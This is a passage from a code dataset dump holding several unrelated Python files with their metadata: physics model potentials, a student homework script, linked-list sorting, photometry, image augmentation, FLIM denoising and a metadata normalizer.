0.005, d = 1.0):\n self.A = a\n self.B = b\n self.C = c\n self.D = d\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = m.copysign(self.A, x) * ( 1.0 - m.exp(-self.B * abs(x)) )\n v22 = -v11\n v12 = self.C * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = self.A * self.B * m.exp(-self.B * abs(x))\n v22 = -v11\n v12 = -2.0 * self.C * self.D * x * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\n## Tunneling through a double avoided crossing used in Tully's 1990 JCP\n#\n# \\f[ V_{11} = 0 \\f]\n# \\f[ V_{22} = -A e^{-Bx^2} + E_0 \\f]\n# \\f[ V_{12} = V_{21} = C e^{-D x^2} \\f]\nclass TullyDualAvoidedCrossing(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.1, b = 0.28, c = 0.015, d = 0.06, e = 0.05):\n self.A = a\n self.B = b\n self.C = c\n self.D = d\n self.E0 = e\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = 0.0\n v22 = - self.A * m.exp(-self.B * x * x) + self.E0\n v12 = self.C * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = 0.0\n v22 = 2.0 * self.A * self.B * x * m.exp(-self.B * x * x)\n v12 = -2.0 * self.C * self.D * x * m.exp(-self.D * x * x)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\n## Model with extended coupling and the possibility of reflection. The most challenging of the\n# models used in Tully's 1990 JCP\n# \\f[ V_{11} = A \\f]\n# \\f[ V_{22} = -A \\f]\n# \\f[\n# V_{12} = \\left\\{ \\begin{array}{cr}\n# B e^{Cx} & x < 0 \\\\\n# B \\left( 2 - e^{-Cx} \\right) & x > 0\n# \\end{array} \\right.\n# \\f]\nclass TullyExtendedCouplingReflection(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.0006, b = 0.10, c = 0.90):\n self.A = a\n self.B = b\n self.C = c\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v11 = self.A\n v22 = -self.A\n v12 = m.exp(-abs(x)*self.C)\n if x < 0:\n v12 = self.B * v12\n else:\n v12 = self.B * (2.0 - v12)\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out\n\n ## \\f$\\nabla V(x)\\f$\n def dV(self, x):\n v11 = 0.0\n v22 = 0.0\n v12 = self.B * self.C * m.exp(-self.C * abs(x))\n out = np.array([ [v11, v12],\n [v12, v22] ])\n return out.reshape([1, 2, 2])\n\n def nstates(self):\n return 2\n\n def ndim(self):\n return 1\n\nclass SuperExchange(object):\n ## Constructor defaults to Prezhdo paper on GFSH\n def __init__(self, v11 = 0.0, v22 = 0.01, v33 = 0.005, v12 = 0.001, v23 = 0.01):\n self.v11 = v11\n self.v22 = v22\n self.v33 = v33\n self.v12 = v12\n self.v23 = v23\n\n ## \\f$V(x)\\f$\n def V(self, x):\n v12 = self.v12 * m.exp(-0.5*x*x)\n v23 = self.v23 * m.exp(-0.5*x*x)\n\n return np.array([ [self.v11, v12, 0.0],\n [v12, self.v22, v23],\n [0.0, v23, self.v33] ])\n\n ## \\f$ \\nabla V(x)\\f$\n def dV(self, x):\n v12 = -x * self.v12 * m.exp(-0.5*x*x)\n v23 = -x * self.v23 * m.exp(-0.5*x*x)\n out = np.array([ [0.0, v12, 0.0],\n [v12, 0.0, v23],\n [0.0, v23, 0.0] ])\n\n return out.reshape([1, 3, 3])\n\n def nstates(self):\n return 3\n\n def ndim(self):\n return 1\n\nmodeldict = { \"simple\" : TullySimpleAvoidedCrossing,\n \"dual\" : TullyDualAvoidedCrossing,\n \"extended\" : TullyExtendedCouplingReflection,\n \"super\" : SuperExchange }\n","sub_path":"tullymodels.py","file_name":"tullymodels.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117218451","text":"#Pranshav Thakkar\n#CS1301 Section A\n# pthakkar7@gatech.edu\n# I worked on this assignment alone, using only this semester's course resources.\n\nprint(\"First, we will convert speed in machs to feet per second.\")\n\ndef machToFPS():\n mach = float(input(\"Enter speed in machs\"))\n FPS = mach * 1116.4370079\n print(\"Your speed in Feet/Second is:\", FPS, \"feet/second\")\n\n#machToFPS()\n\nprint(\"Now, we will calculate the volume of a square pyramid.\")\n\ndef sqPyramidVolume():\n base = float(input(\"Please enter the length of the base in inches\"))\n height = float(input(\"Please enter the height of the pyramid in inches\")) \n volume = (base * base * height)/3\n print(\"The volume of the square pyramid is\",volume,\"inches cubed\")\n \n#sqPyramidVolume() \n\nprint(\"Next, we will convert any number of cents entered into dollars, quarters, dimes, nickels and pennies.\")\n\ndef makeChange():\n cents = int(input(\"Enter the number of cents\"))\n dollars = int(cents/100)\n cents1 = int(cents%100)\n quarters = int(cents1/25)\n cents2 = int(cents1%25)\n dimes = int(cents2/10)\n cents3 = int(cents2%10)\n nickels = int(cents3/5)\n pennies = int(cents3%5)\n print(\"You have\",dollars,\"dollar(s),\",quarters,\"quarter(s),\",dimes,\"dime(s),\",nickels,\"nickel(s),and\",pennies,\"penny(ies).\")\n\n#makeChange() \n\nprint(\"Finally, we will calculate your PPI ratio.\")\n\ndef PPIIndex():\n weight = float(input(\"Please enter your weight in pounds\"))\n height = float(input(\"Please enter your height in inches\"))\n PPI = (weight/height)*1.125\n print(\"Your corrected PPI is {0:.1f}.\".format(PPI))\n\n#PPIIndex()\n\n \n","sub_path":"HW1/HW1.py","file_name":"HW1.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433280250","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'James Z'\n'''\nbuild train_sample\n'''\n\nimport csv\n\ncsvfile = file('train_sample.csv', 'w+')\nwriter1 = csv.writer(csvfile)\ntrain_set1 = set()\ntrain_set0 = set()\n\nfor line in csv.reader('./18_positive_sample.csv', 'rb'):\n\ttrain_set1.add((line[0], line[1]))\nfor line in csv.reader('./sample_18_negative_sample.csv', 'rb'):\n\ttrain_set0.add((line[0], line[1]))\n\nfor line in csv.reader('./data_feature.csv'):\n\tif (line[0], line[1]) in train_set0:\n\t\tline.append('0')\n\t\twriter1.writerow(line)\n\telif (line[0], line[1]) in train_set1:\n\t\tline.append('1')\n\t\twriter1.writerow(line)\n\ncsvfile.close()","sub_path":"build_train_sample.py","file_name":"build_train_sample.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531883174","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n\tdef insertionSortList(self, head: ListNode) -> ListNode:\n\t\tif not head:\n\t\t\treturn None\n\t\tl = self.insertionSortList(head.next)\n\t\thead.next = None\n\t\treturn self.insert(l, head)\n\t\n\tdef insert(self, h, node):\n\t\tif not h:\n\t\t\treturn node\n\t\tdummyHead = ListNode(None)\n\t\tdummyHead.next = h\n\t\tcurr, prev = h, dummyHead\n\t\twhile curr and curr.val <= node.val:\n\t\t\tprev = curr\n\t\t\tcurr = curr.next\n\t\tprev.next = node\n\t\tnode.next = curr\n\t\treturn dummyHead.next\n\n\n\n","sub_path":"linked-list/insertion-sort-list.py","file_name":"insertion-sort-list.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375234081","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nCLASSIFIERS = \"\"\"\nProgramming Language :: Python\nTopic :: Software Development :: Testing\n\"\"\"[1:-1]\n\nsetup(\n name = 'robotframework-httplibrary',\n version = \"0.0.1\",\n description = 'Robot Framework wrapper for livetest',\n long_description = \"Robot Framework wrapper for livetest\",\n author = 'Filip Noetzel',\n author_email = 'filip+rfhttplibrary@j03.de',\n url = 'http://code.google.com/p/robotframework-seleniumlibrary',\n license = 'Beerware',\n keywords = 'robotframework testing testautomation web http livetest webtest',\n platforms = 'any',\n classifiers = CLASSIFIERS.splitlines(),\n package_dir = {'' : 'src'},\n install_requires = ['robotframework', 'livetest'],\n packages = ['HttpLibrary']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254725457","text":"\"\"\"\nThe typology-mover script takes the typology file stored in the keylist directory and places it in the scenario folder.\n\"\"\"\n\n\n\n\nimport os\nimport cea.config\nimport cea.inputlocator\n\n__author__ = \"Justin McCarty\"\n__copyright__ = \"\"\n__credits__ = [\"Justin McCarty\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"\"\n__email__ = \"\"\n__status__ = \"\"\n\ndef copy_typology_file(source_typology_file, locator):\n \"\"\"\n Copy the typology file to the scenario's inputs from the experiment's folder.\n\n :param string source_typology_file: path to a typology file (``*.dbf``)\n :param cea.inputlocator.InputLocator locator: use the InputLocator to find output path\n :return: (this script doesn't return anything)\n \"\"\"\n from shutil import copy\n assert os.path.exists(source_typology_file), \"Could not find new typology file: {source_typology_file}\".format(\n source_typology_file=source_typology_file\n )\n copy(source_typology_file, locator.get_building_typology())\n print(\"Set typology for scenario <{scenario}> to {source_typology_file}\".format(\n scenario=os.path.basename(locator.scenario),\n source_typology_file=source_typology_file\n ))\n\n\ndef main(path,config):\n \"\"\"\n Assign a new typology file to the input folder.\n\n :param cea.config.Configuration config: Configuration object for this script\n :return:\n \"\"\"\n assert os.path.exists(config.scenario), 'Scenario not found: %s' % config.scenario\n locator = cea.inputlocator.InputLocator(config.scenario)\n\n copy_typology_file(path, locator)\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"cea/bigmacc/deprecated/typology_mover.py","file_name":"typology_mover.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"385079920","text":"from astropy.io import fits\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom math import sqrt, log, log10\r\n\r\ndef ast_mag(filename, star_x_coord, star_y_coord, star_w, star_mag, ast_x_coord, ast_y_coord, ast_w, blank_x_coord, blank_y_coord):\r\n im = fits.getdata(filename)\r\n # extract a box of the star's width centered on its x-y coordinates from the image\r\n box_r = int(star_w/2)\r\n star_box = im[star_y_coord-box_r:star_y_coord+box_r+1, star_x_coord-box_r:star_x_coord+box_r+1]\r\n ##print(star_box)\r\n # sum the pixel counts of all pixels inside the box (\"star+sky\")\r\n star_sky = np.sum(star_box)\r\n ##print(star_sky)\r\n # extract a 3X3 box of blank sky centered at the blank x-y coordinates\r\n box_r = 1\r\n blank_box = im[blank_y_coord-box_r:blank_y_coord+box_r+1, blank_x_coord-box_r:blank_x_coord+box_r+1]\r\n ##print(blank_box)\r\n # determine the average pixel count of all pixels inside that box (\"avgSky\")\r\n avgSky = np.sum(blank_box)/9 # total of 9 pixels (3X3)\r\n # calculate the pixel counts for just the star (\"signal\")\r\n n_ap = (star_w)**2\r\n ##print(n_ap)\r\n star_sig = star_sky-avgSky*n_ap\r\n ##print(star_sig)\r\n # determine constant value from the equation mag = -2.5*log(signal, 10)+const\r\n const = 2.5*log(star_sig, 10) + star_mag\r\n ##print(const)\r\n ##print(\"\")\r\n\r\n # extract a box of the asteroid's width centered on its x-y coordinates\r\n box_r = int(ast_w/2)\r\n ast_box = im[ast_y_coord-box_r:ast_y_coord+box_r+1, ast_x_coord-box_r:ast_x_coord+box_r+1]\r\n ##print(ast_box)\r\n # sum asteroid+sky\r\n ast_sky = np.sum(ast_box)\r\n ##print(ast_sky)\r\n # 3X3 box of blank sky is the same as before\r\n # avgSky is the same as before\r\n # calculate the asteroid's signal\r\n n_ap = (ast_w)**2\r\n ##print(n_ap)\r\n ast_sig = ast_sky-avgSky*n_ap\r\n ##print(ast_sig)\r\n \r\n # find asteroid's magnitude\r\n mag = -2.5*log(ast_sig, 10)+const\r\n return mag\r\n\r\n# 18.5008\r\nprint(ast_mag(\"sampleimage.fits\", 173, 342, 5, 15.26, 351, 154, 3, 200, 200))\r\n# 18.7534\r\nprint(ast_mag(\"sampleimage.fits\", 355, 285, 5, 16.11, 351, 154, 3, 200, 200))\r\n","sub_path":"Coding/Python HW 2/diff_photometry.py","file_name":"diff_photometry.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"265442795","text":"import cv2\nimport numpy as np\nfrom math import ceil, floor\n\nclass Augmentation:\n\n def __init__(self):\n return 0\n\n\n def get_translate_parameters(self, index):\n if index == 0: # Translate left 20 percent\n offset = np.array([0.0, 0.2], dtype=np.float32)\n size = np.array([IMAGE_SIZE, ceil(0.8 * IMAGE_SIZE)], dtype=np.int32)\n w_start = 0\n w_end = int(ceil(0.8 * IMAGE_SIZE))\n h_start = 0\n h_end = IMAGE_SIZE\n elif index == 1: # Translate right 20 percent\n offset = np.array([0.0, -0.2], dtype=np.float32)\n size = np.array([IMAGE_SIZE, ceil(0.8 * IMAGE_SIZE)], dtype=np.int32)\n w_start = int(floor((1 - 0.8) * IMAGE_SIZE))\n w_end = IMAGE_SIZE\n h_start = 0\n h_end = IMAGE_SIZE\n elif index == 2: # Translate top 20 percent\n offset = np.array([0.2, 0.0], dtype=np.float32)\n size = np.array([ceil(0.8 * IMAGE_SIZE), IMAGE_SIZE], dtype=np.int32)\n w_start = 0\n w_end = IMAGE_SIZE\n h_start = 0\n h_end = int(ceil(0.8 * IMAGE_SIZE))\n else: # Translate bottom 20 percent\n offset = np.array([-0.2, 0.0], dtype=np.float32)\n size = np.array([ceil(0.8 * IMAGE_SIZE), IMAGE_SIZE], dtype=np.int32)\n w_start = 0\n w_end = IMAGE_SIZE\n h_start = int(floor((1 - 0.8) * IMAGE_SIZE))\n h_end = IMAGE_SIZE\n\n return offset, size, w_start, w_end, h_start, h_end\n\n def get_mask_coord(self, imshape):\n vertices = np.array([[(0.09 * imshape[1], 0.99 * imshape[0]),\n (0.43 * imshape[1], 0.32 * imshape[0]),\n (0.56 * imshape[1], 0.32 * imshape[0]),\n (0.85 * imshape[1], 0.99 * imshape[0])]], dtype=np.int32)\n return vertices\n\n def get_perspective_matrices(self, X_img):\n offset = 15\n img_size = (X_img.shape[1], X_img.shape[0])\n\n # Estimate the coordinates of object of interest inside the image.\n src = np.float32(get_mask_coord(X_img.shape))\n dst = np.float32([[offset, img_size[1]], [offset, 0], [img_size[0] - offset, 0],\n [img_size[0] - offset, img_size[1]]])\n\n perspective_matrix = cv2.getPerspectiveTransform(src, dst)\n return perspective_matrix\n\n def perspective_transform(self, X_img):\n # Doing only for one type of example\n perspective_matrix = get_perspective_matrices(X_img)\n warped_img = cv2.warpPerspective(X_img, perspective_matrix,\n (X_img.shape[1], X_img.shape[0]),\n flags=cv2.INTER_LINEAR)\n return warped_img\n\n def add_gaussian_noise(self, X_imgs):\n gaussian_noise_imgs = []\n row, col, _ = X_imgs[0].shape\n # Gaussian distribution parameters\n mean = 0\n var = 0.1\n sigma = var ** 0.5\n\n for X_img in X_imgs:\n gaussian = np.random.random((row, col, 1)).astype(np.float32)\n gaussian = np.concatenate((gaussian, gaussian, gaussian), axis=2)\n gaussian_img = cv2.addWeighted(X_img, 0.75, 0.25 * gaussian, 0.25, 0)\n gaussian_noise_imgs.append(gaussian_img)\n gaussian_noise_imgs = np.array(gaussian_noise_imgs, dtype=np.float32)\n return gaussian_noise_imgs\n\n\n def add_salt_pepper_noiseadd_salt(self, X_imgs):\n # Need to produce a copy as to not modify the original image\n X_imgs_copy = X_imgs.copy()\n row, col, _ = X_imgs_copy[0].shape\n salt_vs_pepper = 0.2\n amount = 0.004\n num_salt = np.ceil(amount * X_imgs_copy[0].size * salt_vs_pepper)\n num_pepper = np.ceil(amount * X_imgs_copy[0].size * (1.0 - salt_vs_pepper))\n\n for X_img in X_imgs_copy:\n # Add Salt noise\n coords = [np.random.randint(0, i - 1, int(num_salt)) for i in X_img.shape]\n X_img[coords[0], coords[1], :] = 1\n\n # Add Pepper noise\n coords = [np.random.randint(0, i - 1, int(num_pepper)) for i in X_img.shape]\n X_img[coords[0], coords[1], :] = 0\n return X_imgs_copy\n\n","sub_path":"Augmentation.py","file_name":"Augmentation.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300014141","text":"import numpy as np\nimport h5py\nimport re\n\nfrom csbdeep.models import Config, CARE\nimport numpy as np\nimport shutil\nimport os\nfrom csbdeep.utils import plot_some, plot_history\nfrom csbdeep.utils.n2v_utils import manipulate_val_data\n\n# We need to normalize the data before we feed it into our network, and denormalize it afterwards.\ndef normalize(img, mean, std):\n zero_mean = img - mean\n return zero_mean/std\n\ndef denormalize(x, mean, std):\n return x*std + mean\n\ndef sorted_nicely( l ):\n \"\"\" Sorts the given iterable in the way that is expected.\n\n Required arguments:\n l -- The iterable to be sorted.\n\n \"\"\"\n convert = lambda text: int(text) if text.isdigit() else text\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key = alphanum_key)\n\ndef param(group, name):\n return 'G' + str(group) + '_' + name\n\ndef extract_results(filename):\n \"\"\" Extract intensity data from a FLIMfit results file.\n Converts any fraction data (e.g. beta, gamma) to contributions\n\n Required arguments:\n filename - the name of the file to load \n \"\"\"\n file = h5py.File(filename,'r') \n results = file['results']\n\n keys = sorted_nicely(results.keys())\n params = sorted_nicely(results['image 1'].keys())\n\n groups = []\n\n g = 1\n while(param(g,'I_0') in params):\n group = [param(g,'I_0')]\n\n name_search = [param(g,'gamma'), param(g,'beta')]\n\n for name in name_search:\n if len(group) == 1:\n group = group + [x for x in params if x.startswith(name)]\n\n groups.append(group)\n g = g + 1\n\n print(groups)\n\n X = []\n mask = []\n for k in keys:\n A = []\n m = np.array([False])\n\n for group in groups:\n I_0 = results[k][group[0]]\n m = m | ~np.isfinite(I_0)\n if len(group) == 1:\n A.append(I_0)\n else:\n for i in range(1,len(group)):\n A.append(results[k][group[i]][()] * I_0)\n\n A = np.stack(A, axis=-1)\n A[np.isnan(A)] = 0\n X.append(A)\n mask.append(m)\n \n X = np.stack(X)\n mask = np.stack(mask)\n\n return X, groups, mask\n\n\ndef insert_results(filename, X, groups):\n\n file = h5py.File(filename,'a') \n results = file['results']\n\n # Denoise all images\n for i in range(X.shape[0]):\n key = 'image ' + str(i+1)\n\n idx = 0\n for group in groups:\n num_image = max(1, len(group)-1)\n A = X[i,:,:,slice(idx,idx+num_image+1)]\n if len(group) > 1:\n I_0 = np.sum(A, axis=-1, keepdims=True)\n A = A / I_0\n A = np.concatenate((I_0, A), axis=2)\n for j in range(len(group)):\n results[key][group[j]].write_direct(np.ascontiguousarray(A[:,:,j]))\n\n idx = idx + num_image\n\ndef augment_data(X):\n\n XA = [];\n XA.append(X) \n XA.append(np.rot90(X, 1, axes=(1,2)))\n XA.append(np.rot90(X, 2, axes=(1,2)))\n XA.append(np.rot90(X, 3, axes=(1,2)))\n XA.append(np.flip(X, axis=1))\n XA.append(np.flip(X, axis=2))\n return np.concatenate(XA);\n\n\n\n\ndef n2v_flim(project, n2v_num_pix=32):\n \n results_file = os.path.join(project, 'fit_results.hdf5')\n\n X, groups, mask = extract_results(results_file)\n data_shape = np.shape(X)\n print(data_shape)\n\n mean, std = np.mean(X), np.std(X)\n X = normalize(X, mean, std)\n\n XA = X #augment_data(X)\n\n X_val = X[0:10,...]\n\n # We concatenate an extra channel filled with zeros. It will be internally used for the masking.\n Y = np.concatenate((XA, np.zeros(XA.shape)), axis=-1)\n Y_val = np.concatenate((X_val.copy(), np.zeros(X_val.shape)), axis=-1) \n\n n_x = X.shape[1]\n n_chan = X.shape[-1]\n\n manipulate_val_data(X_val, Y_val, num_pix=n_x*n_x*2/n2v_num_pix , shape=(n_x, n_x))\n\n\n # You can increase \"train_steps_per_epoch\" to get even better results at the price of longer computation. \n config = Config('SYXC', \n n_channel_in=n_chan, \n n_channel_out=n_chan, \n unet_kern_size = 5, \n unet_n_depth = 2,\n train_steps_per_epoch=200, \n train_loss='mae',\n train_epochs=35,\n batch_norm = False, \n train_scheme = 'Noise2Void', \n train_batch_size = 128, \n n2v_num_pix = n2v_num_pix,\n n2v_patch_shape = (n2v_num_pix, n2v_num_pix), \n n2v_manipulator = 'uniform_withCP', \n n2v_neighborhood_radius='5')\n\n vars(config)\n\n model = CARE(config, 'n2v_model', basedir=project)\n\n history = model.train(XA, Y, validation_data=(X_val,Y_val))\n\n model.load_weights(name='weights_best.h5')\n\n output_project = project.replace('.flimfit','-n2v.flimfit')\n if os.path.exists(output_project) : shutil.rmtree(output_project)\n shutil.copytree(project, output_project)\n\n output_file = os.path.join(output_project, 'fit_results.hdf5')\n\n X_pred = np.zeros(X.shape)\n for i in range(X.shape[0]):\n X_pred[i,...] = denormalize(model.predict(X[i], axes='YXC',normalizer=None), mean, std)\n\n X_pred[mask] = np.NaN\n\n insert_results(output_file, X_pred, groups)\n","sub_path":"n2v_flim.py","file_name":"n2v_flim.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160234860","text":"tipo_ingresso = {'Vip': 70, 'Normal': 50,'Estudante': 25};\ncliente = {}\n\ndef CadastrarCliente():\n\twhile True:\n\t\tnome_cliente = input('Digite o nome do cliente: ... s para voltar ao menu principal: ')\n\t\tif nome_cliente == 's':\n\t\t\tbreak\n\t\telse:\n\t\t\ttipo_ingresso_cliente = int(input('Digite o Tipo do ingresso: 1 - Vip, 2 - Normal, 3 - Estudante: '))\n\t\t\tif tipo_ingresso_cliente == 1:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Vip']\n\t\t\telif tipo_ingresso_cliente == 2:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Normal']\n\t\t\telif tipo_ingresso_cliente == 3:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Estudante']\n\ndef ListarClientes():\n\tfor cli in cliente:\n\t\t\n\t\tprint(\"\\n| Nome do Cliente: \", cli , \"- Cliente: \", list(tipo_ingresso.keys())[list(tipo_ingresso.values()).index(cliente[cli])],\"- Total: \" , str(cliente[cli]), \"\\n\")\n\nwhile True:\n\topc = int(input('Digite 1 - Cadastrar, 2 - Excluir, 3 - Procurar Cliente no sistema: '))\n\tif opc == 1:\n\t\tCadastrarCliente()\n\telif opc == 2: \n\t\tExcluir()\n\telif opc == 3:\n\t\tListarClientes()","sub_path":"Python/Marco/dicionarios e tuplas/exemplo1.py","file_name":"exemplo1.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304934063","text":"import re\n\nfrom share.normalize import ctx, tools\nfrom share.normalize.parsers import Parser\nfrom share.normalize.normalizer import Normalizer\n\nTHE_REGEX = re.compile(r'(^the\\s|\\sthe\\s)')\n\n\nclass Link(Parser):\n url = ctx\n type = tools.Static('provider')\n\n\nclass ThroughLinks(Parser):\n link = tools.Delegate(Link, ctx)\n\n\nclass Publisher(Parser):\n\n name = ctx.name\n url = tools.OneOf(\n ctx.uri,\n tools.Join(ctx.sameAs),\n tools.Static(None),\n )\n\n class Extra:\n\n publisher = ctx\n\n\nclass Funder(Parser):\n\n community_identifier = tools.Try(ctx.sponsorIdentifier)\n name = ctx.sponsorName\n\n\nclass Award:\n\n # award will become name\n award = tools.Try(ctx.awardIdentifier)\n description = ctx.awardName\n url = tools.Try(ctx.awardIdentifier)\n\n\nclass ThroughAwards:\n\n award = tools.Delegate(Award, ctx)\n\n\nclass Institution(Parser):\n\n name = ctx.name\n\n\nclass Organization(Parser):\n\n name = ctx.name\n\n\nclass Association(Parser):\n pass\n\n\nclass Email(Parser):\n\n email = ctx\n\n\nclass PersonEmail(Parser):\n\n email = tools.Delegate(Email, ctx)\n\n\nclass Identifier(Parser):\n\n url = ctx\n\n\nclass ThroughIdentifiers(Parser):\n\n identifier = tools.Delegate(Identifier, ctx)\n\n\nclass Person(Parser):\n\n suffix = tools.ParseName(ctx.name).suffix\n family_name = tools.ParseName(ctx.name).last\n given_name = tools.ParseName(ctx.name).first\n additional_name = tools.ParseName(ctx.name).middle\n\n emails = tools.Map(\n tools.Delegate(PersonEmail),\n tools.Try(ctx.email)\n )\n affiliations = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Organization))),\n tools.Try(ctx.affiliation)\n )\n\n identifiers = tools.Map(\n tools.Delegate(ThroughIdentifiers),\n tools.Try(ctx.sameAs)\n )\n\n class Extra:\n\n givenName = tools.Try(ctx.givenName)\n\n familyName = tools.Try(ctx.familyName)\n\n additonalName = tools.Try(ctx.additionalName)\n\n name = tools.Try(ctx.name)\n\n\nclass Contributor(Parser):\n\n person = tools.Delegate(Person, ctx)\n cited_name = ctx.name\n order_cited = ctx('index')\n\n\nclass Tag(Parser):\n\n name = ctx\n\n\nclass ThroughTags(Parser):\n\n tag = tools.Delegate(Tag, ctx)\n\n\nclass Subject(Parser):\n\n name = ctx\n\n\nclass ThroughSubjects(Parser):\n\n subject = tools.Delegate(Subject, ctx)\n\n\nclass CreativeWork(Parser):\n\n ORGANIZATION_KEYWORDS = (\n THE_REGEX,\n 'council',\n 'center',\n 'foundation'\n )\n INSTITUTION_KEYWORDS = (\n 'school',\n 'university',\n 'institution',\n 'college',\n 'institute'\n )\n\n awards = tools.Map(\n tools.Delegate(ThroughAwards),\n tools.Try(ctx.sponsorships.award)\n )\n\n contributors = tools.Map(\n tools.Delegate(Contributor),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'contributor'\n )\n )\n\n is_deleted = tools.RunPython('_is_deleted', tools.Try(ctx.otherProperties))\n\n date_updated = tools.ParseDate(tools.Try(ctx.providerUpdatedDateTime))\n\n description = tools.Try(ctx.description)\n\n funders = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Funder))),\n tools.Try(ctx.sponsorships.sponsor)\n )\n\n institutions = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Institution))),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'institution'\n )\n )\n\n # Note: this is only taking the first language in the case of multiple languages\n language = tools.ParseLanguage(\n tools.Try(ctx.languages[0]),\n )\n\n links = tools.Map(\n tools.Delegate(ThroughLinks),\n tools.RunPython(\n 'unique',\n tools.Concat(\n tools.Try(ctx.uris.canonicalUri),\n tools.Try(ctx.uris.providerUris),\n tools.Try(ctx.uris.descriptorUris),\n tools.Try(ctx.uris.objectUris)\n )\n )\n )\n\n organizations = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Organization))),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'organization'\n )\n )\n\n # unsure how to tell difference between person and org\n publishers = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Publisher))),\n tools.Try(ctx.publisher)\n )\n\n rights = tools.Join(tools.Try(ctx.licenses.uri))\n\n subjects = tools.Map(\n tools.Delegate(ThroughSubjects),\n tools.Try(ctx.subjects)\n )\n\n tags = tools.Map(\n tools.Delegate(ThroughTags),\n tools.Try(ctx.tags),\n tools.Try(ctx.subjects)\n )\n\n title = ctx.title\n\n class Extra:\n \"\"\"\n Fields that are combined in the base parser are relisted as singular elements that match\n their original entry to preserve raw data structure.\n \"\"\"\n\n freeToRead = tools.Try(ctx.freeToRead)\n\n languages = tools.Try(ctx.languages)\n\n licenses = tools.Try(ctx.licenses)\n\n otherProperties = tools.Try(ctx.otherProperties)\n\n publisher = tools.Try(ctx.publisher)\n\n subjects = tools.Try(ctx.subjects)\n\n sponsorships = tools.Try(ctx.sponsorships)\n\n tags = tools.Try(ctx.tags)\n\n uris = tools.Try(ctx.uris)\n\n version = tools.Try(ctx.version)\n\n def get_contributors(self, options, entity):\n \"\"\"\n Returns list of organization, institutions, or contributors names based on entity type.\n \"\"\"\n\n if entity == 'organization':\n organizations = [\n value for value in options if\n (\n value['name'] and\n not self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS) and\n self.list_in_string(value['name'], self.ORGANIZATION_KEYWORDS)\n )\n ]\n return organizations\n elif entity == 'institution':\n institutions = [\n value for value in options if\n (\n value['name'] and\n self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS)\n )\n ]\n return institutions\n elif entity == 'contributor':\n people = [\n value for value in options if\n (\n value['name'] and\n not self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS) and not\n self.list_in_string(value['name'], self.ORGANIZATION_KEYWORDS)\n )\n ]\n return people\n else:\n return options\n\n def list_in_string(self, string, list_):\n for word in list_:\n if isinstance(word, str):\n if word in string.lower():\n return True\n else:\n if word.search(string):\n return True\n return False\n\n def unique(self, items):\n return list(sorted(set(items)))\n\n def _is_deleted(self, properties):\n for prop in properties or []:\n if prop['name'] == 'status':\n return 'deleted' in prop['properties'].get('status', [])\n return False\n\n\nclass V1Normalizer(Normalizer):\n root_parser 